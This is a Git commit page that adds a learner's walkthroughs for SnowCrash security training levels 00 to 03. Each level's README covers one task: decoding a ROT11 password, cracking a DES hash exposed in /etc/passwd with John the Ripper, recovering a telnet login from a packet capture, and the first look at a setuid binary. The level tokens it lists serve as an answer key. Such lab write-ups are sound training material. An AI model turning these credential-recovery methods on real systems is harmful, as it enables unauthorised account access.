rparodi/snow-crash
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

refactor(maiboyer): adding the maibaoyer directory

Browse source
This commit is contained in:
Raphael 2026-01-28 03:51:08 +01:00
parent db7f1343c5
commit ab55d4de10
No known key found for this signature in database
48 changed files with 0 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

2
maiboyer/.gitignore vendored Normal file
View file

@ -0,0 +1,2 @@
.dl/
files/

77
maiboyer/level00/README.md Normal file
View file

@ -0,0 +1,77 @@
# Level 00
## how to login
username: level00
password: level00
## Goal
run `getflag` as user `flag00`
## Actually doing something
When logging in, nothing to see
```sh
level00@SnowCrash:~$ ls -la .
total 12
dr-xr-x---+ 1 level00 level00 100 Mar 5 2016 .
d--x--x--x 1 root users 340 Aug 30 2015 ..
-r-xr-x---+ 1 level00 level00 220 Apr 3 2012 .bash_logout
-r-xr-x---+ 1 level00 level00 3518 Aug 30 2015 .bashrc
-r-xr-x---+ 1 level00 level00 675 Apr 3 2012 .profile
```
Trying to find anything to do:
```sh
level00@SnowCrash:~$ find / -user flag00 -print 2>/dev/null
/usr/sbin/john
/rofs/usr/sbin/john
```
The `/rofs` seems to be a read only version of the root (`/`), meaning that we dont really care about it
running `file` on `/usr/sbin/john` says that it is an ASCII file
lets open it
```bash
level00@SnowCrash:~$ cat /usr/sbin/john
cdiiddwpgswtgt
```
lets also confirm that the `/usr/sbin/john` and `/rofs/usr/sbin/john` is the same
```bash
level00@SnowCrash:~$ sha256sum /rofs/usr/sbin/john /usr/sbin/john
c36e744787ff060c5711ac4b5d06439a9f265169fb82946a8d1052f4a935103e /rofs/usr/sbin/john
c36e744787ff060c5711ac4b5d06439a9f265169fb82946a8d1052f4a935103e /usr/sbin/john
```
They are indeed the same. I have fiddled with the iso itself, and it uses a readonly filesytem to store everything,
so this seems to be how they still have some kind of "normal" system
We now have something that looks like it wants us poke at it (the text).
The file itself isn't executable (even if it is in `/usr/sbin/`)
Cyberchef is a nice tool to fiddle with random ciffers, so lets have fun :D
link: [https://cyberchef.org/](https://cyberchef.org/)
After having fun with the website, we can see that with a ROT11 (also named Caesar substitution), we find some english text:
```
nottoohardhere
```
is it the password of the user `flag00` ?
```bash
level00@SnowCrash:~$ su flag00
Password:
Don't forget to launch getflag !
flag00@SnowCrash:~$ getflag
Check flag.Here is your token : x24ti5gi3x0ol2eh4esiuxias
```
yes it is !

1
maiboyer/level00/flag Normal file
View file

@ -0,0 +1 @@
x24ti5gi3x0ol2eh4esiuxias

1
maiboyer/level00/passwd Normal file
View file

@ -0,0 +1 @@
level00

87
maiboyer/level01/README.md Normal file
View file

@ -0,0 +1,87 @@
# Level 01
## how to login
username: level01
password: x24ti5gi3x0ol2eh4esiuxias
## Goal
run `getflag` as user `flag01`
## Actually doing something
Again lets check around
```bash
level01@SnowCrash:~$ ls -la
total 12
dr-x------ 1 level01 level01 100 Mar 5 2016 .
d--x--x--x 1 root users 340 Aug 30 2015 ..
-r-x------ 1 level01 level01 220 Apr 3 2012 .bash_logout
-r-x------ 1 level01 level01 3518 Aug 30 2015 .bashrc
-r-x------ 1 level01 level01 675 Apr 3 2012 .profile
```
nothing to see again, the file present are the default files on Ubuntu 12.04
lets try to find anything to do
```bash
level01@SnowCrash:~$ find / -user flag01 -print 2>/dev/null
level01@SnowCrash:~$
```
Right... nothing to see here
So after looking around, the file `/etc/passwd` looks juicy: it has an password hash for the user flag02
```bash
level01@ShowCrash:~$ cat /etc/passwd
[...snip...]
level13:x:2013:2013::/home/user/level13:/bin/bash
level14:x:2014:2014::/home/user/level14:/bin/bash
flag00:x:3000:3000::/home/flag/flag00:/bin/bash
flag01:42hDRfypTqqnw:3001:3001::/home/flag/flag01:/bin/bash
flag02:x:3002:3002::/home/flag/flag02:/bin/bash
flag03:x:3003:3003::/home/flag/flag03:/bin/bash
flag04:x:3004:3004::/home/flag/flag04:/bin/bash
flag05:x:3005:3005::/home/flag/flag05:/bin/bash
[...snip...]
```
When looking at this, you might think that all the other users also have their password hash in here
(and that they share the same password because the hash is `x`)
but actually `x` means that the actual hash is located in the shadow file (`/etc/shadow`)
The shadow file is not readable, so we can't get those hashes. Only the user `flag01` has his password hash
readable by other users
it seems that the first level was an hint to use john the ripper, a program made to crack hashes
after installing it on my host computer (thanks nix), running it is very simple
```bash
echo "42hDRfypTqqnw" >hashfile
john hashfile
Warning: detected hash type "descrypt", but the string is also recognized as "descrypt-opencl"
Use the "--format=descrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2])
Will run 12 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/nix/store/yq1921vpkb03aj2hxrwbczb72p2kk5wm-john-rolling-2404/share/john/password.lst
Enabling duplicate candidate password suppressor
abcdefg (?)
1g 0:00:00:00 DONE 2/3 (2026-01-19 14:38) 3.704g/s 273066p/s 273066c/s 273066C/s 123456..gravitat
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
so it has found an string that give the same hash. Just to be pedantic,
this can be a different string from what the user typed when setting their password, but it provide the same hash so it works
lets try it
```bash
level01@SnowCrash:~$ su flag01 -c getflag
Password:
Check flag.Here is your token : f2av5il02puano7naaf6adaaf
```

1
maiboyer/level01/flag Normal file
View file

@ -0,0 +1 @@
f2av5il02puano7naaf6adaaf

1
maiboyer/level01/passwd Normal file
View file

@ -0,0 +1 @@
x24ti5gi3x0ol2eh4esiuxias

300
maiboyer/level02/README.md Normal file
View file

@ -0,0 +1,300 @@
# Level 02
## how to login
username: level02
password: f2av5il02puano7naaf6adaaf
## Goal
run `getflag` as user `flag02`
## Actually doing something
as always:
```bash
level02@SnowCrash:~$ ll
total 24
dr-x------ 1 level02 level02 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level02 level02 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level02 level02 3518 Aug 30 2015 .bashrc*
----r--r-- 1 flag02 level02 8302 Aug 30 2015 level02.pcap
-r-x------ 1 level02 level02 675 Apr 3 2012 .profile*
```
we have a new one !
lets try to find what this .pcap file is actually
```bash
level02@SnowCrash:~$ file level02.pcap
level02.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 16777216)
```
seems like a job for wireshark !
#### What is wireshark ?
Wireshark is a program that allows the user to look at network (and a lot of other stuff) packets, with alot of information
It can try to parse packets, show you information and is overhall VERY USERFULL to understand what is happening
#### Using Wireshark
We can load the capture file into wireshark, and then we get presented with a list of packets.
```bash
nix run nixpkgs\#wireshark-cli -- -r ./level02.pcap
1 0.000000 59.233.235.218 → 59.233.235.223 TCP 74 39247 → 12121 [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM TSval=18592800 TSecr=0 WS=128
2 0.000128 59.233.235.223 → 59.233.235.218 TCP 74 12121 → 39247 [SYN, ACK] Seq=0 Ack=1 Win=14480 Len=0 MSS=1460 SACK_PERM TSval=46280417 TSecr=18592800 WS=32
3 0.000390 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=1 Ack=1 Win=14720 Len=0 TSval=18592800 TSecr=46280417
4 0.036008 59.233.235.223 → 59.233.235.218 TCP 69 12121 → 39247 [PSH, ACK] Seq=1 Ack=1 Win=14496 Len=3 TSval=46280426 TSecr=18592800
5 0.036255 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=1 Ack=4 Win=14720 Len=0 TSval=18592804 TSecr=46280426
6 0.036276 59.233.235.218 → 59.233.235.223 TCP 69 39247 → 12121 [PSH, ACK] Seq=1 Ack=4 Win=14720 Len=3 TSval=18592804 TSecr=46280426
7 0.036396 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=4 Ack=4 Win=14496 Len=0 TSval=46280426 TSecr=18592804
8 0.036581 59.233.235.223 → 59.233.235.218 TCP 84 12121 → 39247 [PSH, ACK] Seq=4 Ack=4 Win=14496 Len=18 TSval=46280426 TSecr=18592804
9 0.036698 59.233.235.218 → 59.233.235.223 TCP 84 39247 → 12121 [PSH, ACK] Seq=4 Ack=22 Win=14720 Len=18 TSval=18592804 TSecr=46280426
10 0.036859 59.233.235.223 → 59.233.235.218 TCP 90 12121 → 39247 [PSH, ACK] Seq=22 Ack=22 Win=14496 Len=24 TSval=46280426 TSecr=18592804
11 0.037039 59.233.235.218 → 59.233.235.223 TCP 133 39247 → 12121 [PSH, ACK] Seq=22 Ack=46 Win=14720 Len=67 TSval=18592804 TSecr=46280426
12 0.039170 59.233.235.223 → 59.233.235.218 TCP 84 12121 → 39247 [PSH, ACK] Seq=46 Ack=89 Win=14496 Len=18 TSval=46280427 TSecr=18592804
13 0.039392 59.233.235.218 → 59.233.235.223 TCP 140 39247 → 12121 [PSH, ACK] Seq=89 Ack=64 Win=14720 Len=74 TSval=18592804 TSecr=46280427
14 0.039704 59.233.235.223 → 59.233.235.218 TCP 73 12121 → 39247 [PSH, ACK] Seq=64 Ack=163 Win=14496 Len=7 TSval=46280427 TSecr=18592804
15 0.039842 59.233.235.218 → 59.233.235.223 TCP 73 39247 → 12121 [PSH, ACK] Seq=163 Ack=71 Win=14720 Len=7 TSval=18592804 TSecr=46280427
16 0.040138 59.233.235.223 → 59.233.235.218 TCP 81 12121 → 39247 [PSH, ACK] Seq=71 Ack=170 Win=14496 Len=15 TSval=46280427 TSecr=18592804
17 0.040277 59.233.235.218 → 59.233.235.223 TCP 75 39247 → 12121 [PSH, ACK] Seq=170 Ack=86 Win=14720 Len=9 TSval=18592804 TSecr=46280427
18 0.040450 59.233.235.223 → 59.233.235.218 TCP 107 12121 → 39247 [PSH, ACK] Seq=86 Ack=179 Win=14496 Len=41 TSval=46280427 TSecr=18592804
19 0.071743 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=179 Ack=127 Win=14720 Len=0 TSval=18592808 TSecr=46280427
20 0.071825 59.233.235.223 → 59.233.235.218 TCP 141 12121 → 39247 [PSH, ACK] Seq=127 Ack=179 Win=14496 Len=75 TSval=46280435 TSecr=18592808
21 0.071976 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=179 Ack=202 Win=14720 Len=0 TSval=18592808 TSecr=46280435
22 12.223886 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=179 Ack=202 Win=14720 Len=1 TSval=18594023 TSecr=46280435
23 12.229432 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=202 Ack=180 Win=14496 Len=2 TSval=46283475 TSecr=18594023
24 12.229592 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=180 Ack=204 Win=14720 Len=0 TSval=18594023 TSecr=46283475
25 12.323890 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=180 Ack=204 Win=14720 Len=1 TSval=18594033 TSecr=46283475
26 12.329436 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=204 Ack=181 Win=14496 Len=2 TSval=46283500 TSecr=18594033
27 12.329654 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=181 Ack=206 Win=14720 Len=0 TSval=18594033 TSecr=46283500
28 12.553547 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=181 Ack=206 Win=14720 Len=1 TSval=18594056 TSecr=46283500
29 12.561397 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=206 Ack=182 Win=14496 Len=2 TSval=46283558 TSecr=18594056
30 12.561533 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=182 Ack=208 Win=14720 Len=0 TSval=18594056 TSecr=46283558
31 12.644167 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=182 Ack=208 Win=14720 Len=1 TSval=18594065 TSecr=46283558
32 12.649394 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=208 Ack=183 Win=14496 Len=2 TSval=46283580 TSecr=18594065
33 12.649527 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=183 Ack=210 Win=14720 Len=0 TSval=18594065 TSecr=46283580
34 12.714079 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=183 Ack=210 Win=14720 Len=1 TSval=18594072 TSecr=46283580
35 12.721391 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=210 Ack=184 Win=14496 Len=2 TSval=46283598 TSecr=18594072
36 12.721530 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=184 Ack=212 Win=14720 Len=0 TSval=18594072 TSecr=46283598
37 13.043928 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=184 Ack=212 Win=14720 Len=1 TSval=18594105 TSecr=46283598
38 13.049520 59.233.235.223 → 59.233.235.218 TCP 68 12121 → 39247 [PSH, ACK] Seq=212 Ack=185 Win=14496 Len=2 TSval=46283680 TSecr=18594105
39 13.049762 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=185 Ack=214 Win=14720 Len=0 TSval=18594105 TSecr=46283680
40 13.823856 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=185 Ack=214 Win=14720 Len=1 TSval=18594183 TSecr=46283680
41 13.827303 59.233.235.223 → 59.233.235.218 TCP 67 12121 → 39247 [PSH, ACK] Seq=214 Ack=186 Win=14496 Len=1 TSval=46283874 TSecr=18594183
42 13.827557 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=186 Ack=215 Win=14720 Len=0 TSval=18594183 TSecr=46283874
43 13.827653 59.233.235.223 → 59.233.235.218 TCP 79 12121 → 39247 [PSH, ACK] Seq=215 Ack=186 Win=14496 Len=13 TSval=46283874 TSecr=18594183
44 13.827763 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=186 Ack=228 Win=14720 Len=0 TSval=18594183 TSecr=46283874
45 22.095852 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=186 Ack=228 Win=14720 Len=1 TSval=18595010 TSecr=46283874
46 22.133398 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=187 Win=14496 Len=0 TSval=46285951 TSecr=18595010
47 22.985487 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=187 Ack=228 Win=14720 Len=1 TSval=18595099 TSecr=46285951
48 22.985568 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=188 Win=14496 Len=0 TSval=46286164 TSecr=18595099
49 23.605835 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=188 Ack=228 Win=14720 Len=1 TSval=18595161 TSecr=46286164
50 23.605906 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=189 Win=14496 Len=0 TSval=46286319 TSecr=18595161
51 24.076245 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=189 Ack=228 Win=14720 Len=1 TSval=18595208 TSecr=46286319
52 24.076322 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=190 Win=14496 Len=0 TSval=46286436 TSecr=18595208
53 24.306019 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=190 Ack=228 Win=14720 Len=1 TSval=18595231 TSecr=46286436
54 24.306080 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=191 Win=14496 Len=0 TSval=46286494 TSecr=18595231
55 24.535764 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=191 Ack=228 Win=14720 Len=1 TSval=18595254 TSecr=46286494
56 24.535825 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=192 Win=14496 Len=0 TSval=46286551 TSecr=18595254
57 24.675695 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=192 Ack=228 Win=14720 Len=1 TSval=18595268 TSecr=46286551
58 24.675752 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=193 Win=14496 Len=0 TSval=46286586 TSecr=18595268
59 25.016142 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=193 Ack=228 Win=14720 Len=1 TSval=18595302 TSecr=46286586
60 25.016217 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=194 Win=14496 Len=0 TSval=46286671 TSecr=18595302
61 26.596535 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=194 Ack=228 Win=14720 Len=1 TSval=18595460 TSecr=46286671
62 26.596615 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=195 Win=14496 Len=0 TSval=46287066 TSecr=18595460
63 26.966369 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=195 Ack=228 Win=14720 Len=1 TSval=18595497 TSecr=46287066
64 26.966450 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=196 Win=14496 Len=0 TSval=46287159 TSecr=18595497
65 27.336798 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=196 Ack=228 Win=14720 Len=1 TSval=18595534 TSecr=46287159
66 27.336848 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=197 Win=14496 Len=0 TSval=46287251 TSecr=18595534
67 28.106976 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=197 Ack=228 Win=14720 Len=1 TSval=18595611 TSecr=46287251
68 28.107054 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=198 Win=14496 Len=0 TSval=46287444 TSecr=18595611
69 28.306873 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=198 Ack=228 Win=14720 Len=1 TSval=18595631 TSecr=46287444
70 28.306942 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=199 Win=14496 Len=0 TSval=46287494 TSecr=18595631
71 29.996885 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=199 Ack=228 Win=14720 Len=1 TSval=18595800 TSecr=46287494
72 29.996963 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=200 Win=14496 Len=0 TSval=46287916 TSecr=18595800
73 31.307388 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=200 Ack=228 Win=14720 Len=1 TSval=18595931 TSecr=46287916
74 31.307470 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=201 Win=14496 Len=0 TSval=46288244 TSecr=18595931
75 31.747118 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=201 Ack=228 Win=14720 Len=1 TSval=18595975 TSecr=46288244
76 31.747176 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=202 Win=14496 Len=0 TSval=46288354 TSecr=18595975
77 32.367715 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=202 Ack=228 Win=14720 Len=1 TSval=18596037 TSecr=46288354
78 32.367798 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=203 Win=14496 Len=0 TSval=46288509 TSecr=18596037
79 32.537454 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=203 Ack=228 Win=14720 Len=1 TSval=18596054 TSecr=46288509
80 32.537506 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=204 Win=14496 Len=0 TSval=46288552 TSecr=18596054
81 32.807373 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=204 Ack=228 Win=14720 Len=1 TSval=18596081 TSecr=46288552
82 32.807426 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=205 Win=14496 Len=0 TSval=46288619 TSecr=18596081
83 32.837328 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=205 Ack=228 Win=14720 Len=1 TSval=18596084 TSecr=46288619
84 32.837382 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=206 Win=14496 Len=0 TSval=46288626 TSecr=18596084
85 33.697667 59.233.235.218 → 59.233.235.223 TCP 67 39247 → 12121 [PSH, ACK] Seq=206 Ack=228 Win=14720 Len=1 TSval=18596170 TSecr=46288626
86 33.697744 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [ACK] Seq=228 Ack=207 Win=14496 Len=0 TSval=46288842 TSecr=18596170
87 33.705420 59.233.235.223 → 59.233.235.218 TCP 69 12121 → 39247 [PSH, ACK] Seq=228 Ack=207 Win=14496 Len=3 TSval=46288844 TSecr=18596170
88 33.705616 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=231 Win=14720 Len=0 TSval=18596170 TSecr=46288844
89 36.462504 59.233.235.223 → 59.233.235.218 TCP 67 12121 → 39247 [PSH, ACK] Seq=231 Ack=207 Win=14496 Len=1 TSval=46289533 TSecr=18596170
90 36.462761 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=232 Win=14720 Len=0 TSval=18596446 TSecr=46289533
91 36.462858 59.233.235.223 → 59.233.235.218 TCP 101 12121 → 39247 [PSH, ACK] Seq=232 Ack=207 Win=14496 Len=35 TSval=46289533 TSecr=18596446
92 36.463013 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=207 Ack=267 Win=14720 Len=0 TSval=18596446 TSecr=46289533
93 42.109464 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [FIN, ACK] Seq=207 Ack=267 Win=14720 Len=0 TSval=18597011 TSecr=46289533
94 42.110028 59.233.235.223 → 59.233.235.218 TCP 66 12121 → 39247 [FIN, ACK] Seq=267 Ack=208 Win=14496 Len=0 TSval=46290945 TSecr=18597011
95 42.110236 59.233.235.218 → 59.233.235.223 TCP 66 39247 → 12121 [ACK] Seq=208 Ack=268 Win=14720 Len=0 TSval=18597011 TSecr=46290945
```
So yeah... Tcp is not a nice protocol to look at if you don't know anything
Looking at packets by hand in the gui, I can see some ASCII text
```plain
$'E@@A;;/YOtK
.(
Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)
wwwbugs login:
```
Wireshark as a way to see the "total" TCP converstation
We *could* do it by hand, copying every "data" section and pasting it into a single file, but why do it when wireshare does it better
If we do that, we get an nicely formatted stuff
```hexdump
00000000 ff fd 25 ..%
00000000 ff fc 25 ..%
00000003 ff fb 26 ff fd 18 ff fd 20 ff fd 23 ff fd 27 ff ..&..... ..#..'.
00000013 fd 24 .$
00000003 ff fe 26 ff fb 18 ff fb 20 ff fb 23 ff fb 27 ff ..&..... ..#..'.
00000013 fc 24 .$
00000015 ff fa 20 01 ff f0 ff fa 23 01 ff f0 ff fa 27 01 .. ..... #.....'.
00000025 ff f0 ff fa 18 01 ff f0 ........
00000015 ff fa 20 00 33 38 34 30 30 2c 33 38 34 30 30 ff .. .3840 0,38400.
00000025 f0 ff fa 23 00 53 6f 64 61 43 61 6e 3a 30 ff f0 ...#.Sod aCan:0..
00000035 ff fa 27 00 00 44 49 53 50 4c 41 59 01 53 6f 64 ..'..DIS PLAY.Sod
00000045 61 43 61 6e 3a 30 ff f0 ff fa 18 00 78 74 65 72 aCan:0.. ....xter
00000055 6d ff f0 m..
0000002D ff fb 03 ff fd 01 ff fd 22 ff fd 1f ff fb 05 ff ........ ".......
0000003D fd 21 .!
00000058 ff fd 03 ff fc 01 ff fb 22 ff fa 22 03 01 00 00 ........ ".."....
00000068 03 62 03 04 02 0f 05 00 00 07 62 1c 08 02 04 09 .b...... ..b.....
00000078 42 1a 0a 02 7f 0b 02 15 0f 02 11 10 02 13 11 02 B....... ........
00000088 ff ff 12 02 ff ff ff f0 ff fb 1f ff fa 1f 00 b1 ........ ........
00000098 00 31 ff f0 ff fd 05 ff fb 21 .1...... .!
0000003F ff fa 22 01 03 ff f0 .."....
000000A2 ff fa 22 01 07 ff f0 .."....
00000046 ff fa 21 03 ff f0 ff fb 01 ff fd 00 ff fe 22 ..!..... ......"
000000A9 ff fd 01 ff fb 00 ff fc 22 ........ "
00000055 ff fa 22 03 03 e2 03 04 82 0f 07 e2 1c 08 82 04 .."..... ........
00000065 09 c2 1a 0a 82 7f 0b 82 15 0f 82 11 10 82 13 11 ........ ........
00000075 82 ff ff 12 82 ff ff ff f0 ........ .
0000007E 0d 0a 4c 69 6e 75 78 20 32 2e 36 2e 33 38 2d 38 ..Linux 2.6.38-8
0000008E 2d 67 65 6e 65 72 69 63 2d 70 61 65 20 28 3a 3a -generic -pae (::
0000009E 66 66 66 66 3a 31 30 2e 31 2e 31 2e 32 29 20 28 ffff:10. 1.1.2) (
000000AE 70 74 73 2f 31 30 29 0d 0a 0a 01 00 77 77 77 62 pts/10). ....wwwb
000000BE 75 67 73 20 6c 6f 67 69 6e 3a 20 ugs logi n:
000000B2 6c l
000000C9 00 6c .l
000000B3 65 e
000000CB 00 65 .e
000000B4 76 v
000000CD 00 76 .v
000000B5 65 e
000000CF 00 65 .e
000000B6 6c l
000000D1 00 6c .l
000000B7 58 X
000000D3 00 58 .X
000000B8 0d .
000000D5 01 .
000000D6 00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Passw ord:
000000B9 66 f
000000BA 74 t
000000BB 5f _
000000BC 77 w
000000BD 61 a
000000BE 6e n
000000BF 64 d
000000C0 72 r
000000C1 7f .
000000C2 7f .
000000C3 7f .
000000C4 4e N
000000C5 44 D
000000C6 52 R
000000C7 65 e
000000C8 6c l
000000C9 7f .
000000CA 4c L
000000CB 30 0
000000CC 4c L
000000CD 0d .
000000E3 00 0d 0a ...
000000E6 01 .
000000E7 00 0d 0a 4c 6f 67 69 6e 20 69 6e 63 6f 72 72 65 ...Login incorre
000000F7 63 74 0d 0a 77 77 77 62 75 67 73 20 6c 6f 67 69 ct..wwwb ugs logi
00000107 6e 3a 20 n:
```
This looks a bit annoying, but if we remove the hexdump stuff, and keep only the ascii (non ascii are represneted by `.` )characters, we get this
```
> ..%
< ..%
> ..&..... ..#..'..$
< ..&..... ..#..'..$
> .. .....#.....'.........
< .. .38400,38400....#.SodaCan:0....'..DISPLAY.SodaCan:0......xterm..
> ........"........!
< ........"..".....b........b.... B.
< ..............................1.......!
> .."....
< .."....
> ..!..........."
< ........"
> .."............. ..
> .....................
> Linux 2.6.38-8-generic-pae (::ffff:10.1.1.2) (pts/10)
> ..wwwbugs login:
< l
> .l
< e
> .e
< v
> .v
< e
> .e
< l
> .l
< X
> .X
> ..
> Password:
< ft_wandr...NDRel.L0L
> .
> ..
> Login incorrect
> wwwbugs login:
```
(Legend: `<` means client send this to the server and `>` means the server sent this to the client. any `.` may represent an non-ascii/non-character byte)
We see a nice `Passowrd:` sent by the server, with a nice response of `ft_wandr...NDRel.L0L`.
While looking at the hexdump, we can decipher what the `.` are truly representing
as a C string it looks like this `"ft_wandr\x7f\x7f\x7fNDRel\x7fL0L"`
a quick `man ascii` reveal that `\x7f` is the `DEL` character.
Assuming this means that mister Wandre failed to type is password, corrected it, and sent it, it would be
`ft_waNDReL0L`
```bash
level02@SnowCrash:~$ su flag02 -c getflag
Password:
Check flag.Here is your token : kooda2puivaav1idi4f57q8iq
```

0
maiboyer/level02/flag Normal file
View file

1
maiboyer/level02/passwd Normal file
View file

@ -0,0 +1 @@
f2av5il02puano7naaf6adaaf

110
maiboyer/level03/README.md Normal file
View file

@ -0,0 +1,110 @@
# Level 03
## how to login
username: level03
password: kooda2puivaav1idi4f57q8iq
## Goal
run `getflag` as user `flag03`
## Actually doing something
As usual:
```bash
level03@SnowCrash:~$ ll
total 24
dr-x------ 1 level03 level03 120 Mar 5 2016 ./
d--x--x--x 1 root users 340 Aug 30 2015 ../
-r-x------ 1 level03 level03 220 Apr 3 2012 .bash_logout*
-r-x------ 1 level03 level03 3518 Aug 30 2015 .bashrc*
-rwsr-sr-x 1 flag03 level03 8627 Mar 5 2016 level03*
-r-x------ 1 level03 level03 675 Apr 3 2012 .profile*
```
We have a funny binary !
having the `s` permission in the executable spot means it is setuid
what is setuid ? it means that when executed, it runs as the user that own the binary
What a coincidence ! The user that own the binary is `flag03`
lets look at what happens when we run the binary without anything special:
```bash
level03@SnowCrash:~$ ./level03
Exploit me
```
Oh yes I will !
```bash
level03@SnowCrash:~$ file level03
level03: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x3bee584f790153856e826e38544b9e80ac184b7b, not stripped
```
